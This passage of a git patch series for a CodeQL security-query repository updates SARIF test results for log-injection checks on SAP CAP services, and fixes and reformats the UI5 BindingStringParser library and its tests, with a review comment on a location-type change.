- } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : 
"%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 
17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } } ], + "results" : [ ], "newlineSequences" : [ "\r\n", "\n", "
", "
" ], "columnKind" : "utf16CodeUnits", "properties" : { - "codeqlConfigSummary" : { - "disableDefaultQueries" : false, - "queries" : [ { - "type" : "builtinSuite", - "uses" : "security-extended" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" - } ] - }, + "semmle.formatSpecifier" : "sarif-latest", "metricResults" : [ { "rule" : { "id" : "js/summary/lines-of-code", - "index" : 101, + "index" : 100, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "ruleId" : "js/summary/lines-of-code", - "value" : 2973 + "value" : 480 }, { "rule" : { "id" : "js/summary/lines-of-user-code", - "index" : 102, + "index" : 101, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "ruleId" : "js/summary/lines-of-user-code", - "value" : 2973, + "value" : 480, "baseline" : 0 } ], - "semmle.formatSpecifier" : "sarif-latest" + "codeqlConfigSummary" : { + "disableDefaultQueries" : false, + "queries" : [ { + "type" : "builtinSuite", + "uses" : "security-extended" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" + } ] + } } } ] } \ No newline at end of file From 9c7b40c472f35df0044070098e5344e3ed4b7d10 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 21:56:10 +0200 Subject: [PATCH 14/15] Fix BindingStringParser test --- .../frameworks/ui5/BindingStringParser.qll | 10 ++++++---- .../javascript/frameworks/ui5/Bindings.qll | 10 +++++----- .../BindingStringParser/BindingStringParser.ql | 16 ++++------------ 3 files changed, 15 insertions(+), 21 deletions(-) 
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll
index 73ed3e77d..2dcb2293a 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/BindingStringParser.qll
@@ -2,7 +2,8 @@ import javascript as stdlib
 signature class BindingStringReaderSig {
 string getBindingString();
- stdlib::Location getLocation();
+
+ stdlib::DbLocation getLocation();
 // Get a dataflow node associated with the binding string, if any.
 // Note that not all location from which we can obtain a binding string
@@ -51,7 +52,8 @@ module BindingStringParser {
 value = ":"
 } or
 MkNumberToken(int begin, int end, string value, BindingStringReader reader) {
- value = reader.getBindingString().regexpFind("-?[1-9]\\d*(\\.\\d+)?((e|E)?(\\+|-)?\\d+)?", _, begin) and
+ value =
+ reader.getBindingString().regexpFind("-?[1-9]\\d*(\\.\\d+)?((e|E)?(\\+|-)?\\d+)?", _, begin) and
 begin + value.length() - 1 = end
 } or
 MkStringToken(int begin, int end, string value, BindingStringReader reader) {
@@ -95,9 +97,9 @@ module BindingStringParser {
 .getBindingString()
 .regexpFind("(?:#|#@)?(?:[a-zA-Z][a-zA-Z0-9_]*|[a-zA-Z0-9][a-zA-Z0-9_]:[a-zA-Z0-9_]+)(?:\\([^\\)]*\\))?", _, begin) and
- begin + value.length() - 1 = end
+ begin + value.length() - 1 = end and
 // exclude keyword
- and not value in ["true", "false", "null"]
+ not value in ["true", "false", "null"]
 } or
 MkGreaterThanToken(int begin, int end, string value, BindingStringReader reader) {
 begin = reader.getBindingString().indexOf(">") and
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll
index dacd411c4..032d41a87 100644
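Review bot: The new `stdlib::DbLocation getLocation();` member of `BindingStringReaderSig` carries no doc comment, unlike `getANode()` directly below it, so implementers get no explanation of why the narrower `DbLocation` is now required in place of `stdlib::Location`. A one-line comment above it such as `// Source location of the binding string; must be a concrete stdlib::DbLocation, not a general stdlib::Location.` would record the contract, and the commit message could name the library change that motivated it. The same narrowing is applied to `BindingStringReader.getLocation()` in Bindings.qll in this commit; that predicate's body continues outside its hunk, so the other `TBindingString` branches must also yield `DbLocation` values — presumably they do, but it is worth confirming. The `signature class` opened here also has members beyond the end of this hunk.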
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Bindings.qll
@@ -60,7 +60,7 @@ private class BindingStringReader extends TBindingString {
 )
 }
- Location getLocation() {
+ DbLocation getLocation() {
 exists(StringLiteral stringLiteral |
 this = TBindingStringFromLiteral(stringLiteral) and
 result = stringLiteral.getLocation()
@@ -221,10 +221,10 @@ private predicate earlyPropertyBinding(
 or
 // Composite binding https://ui5.sap.com/#/topic/a2fe8e763014477e87990ff50657a0d0
 exists(
- DataFlow::ObjectLiteralNode objectLiteral,
- DataFlow::ObjectLiteralNode valueLiteral, DataFlow::PropWrite partWrite,
- DataFlow::ArrayLiteralNode partsArray, DataFlow::ObjectLiteralNode partsElement,
- DataFlow::PropWrite pathWrite, DataFlow::ValueNode pathValue
+ DataFlow::ObjectLiteralNode objectLiteral, DataFlow::ObjectLiteralNode valueLiteral,
+ DataFlow::PropWrite partWrite, DataFlow::ArrayLiteralNode partsArray,
+ DataFlow::ObjectLiteralNode partsElement, DataFlow::PropWrite pathWrite,
+ DataFlow::ValueNode pathValue
 |
 objectLiteral.getAPropertyWrite() = bindingTarget and
 bindingTarget.writes(_, "value", binding) and
diff --git a/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql b/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql
index 78c4f00da..10b9a5694 100644
--- a/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql
+++ b/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql
@@ -3,22 +3,14 @@ import advanced_security.javascript.frameworks.ui5.Bindings
 import advanced_security.javascript.frameworks.ui5.BindingStringParser as Make
 class BindingStringReader extends StringLiteral {
- BindingStringReader() {
- this.getValue().matches("{%}")
- }
+ BindingStringReader() { this.getValue().matches("{%}") }
- string getBindingString() {
- result = this.getValue()
- }
-
- DataFlow::Node getANode() {
- result.asExpr() = this
- }
+ string getBindingString() { result = this.getValue() }
+
+ DataFlow::Node getANode() { result.asExpr() = this }
 }
 module BindingStringParser = Make::BindingStringParser;
 from BindingStringParser::Binding binding
 select binding
-
-
From 33ba6eab12aa65e76f0ea327cd1846d943fa16dd Mon Sep 17 00:00:00 2001
From: Mauro Baluda
Date: Wed, 22 May 2024 21:58:29 +0200
Subject: [PATCH 15/15] formatting
---
 javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql b/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql
index 830a6f21a..825ed3701 100644
--- a/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql
+++ b/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql
@@ -1,4 +1,4 @@
 import javascript
 import advanced_security.javascript.frameworks.ui5.Bindings
-select any(Binding b)
\ No newline at end of file
+select any(Binding b)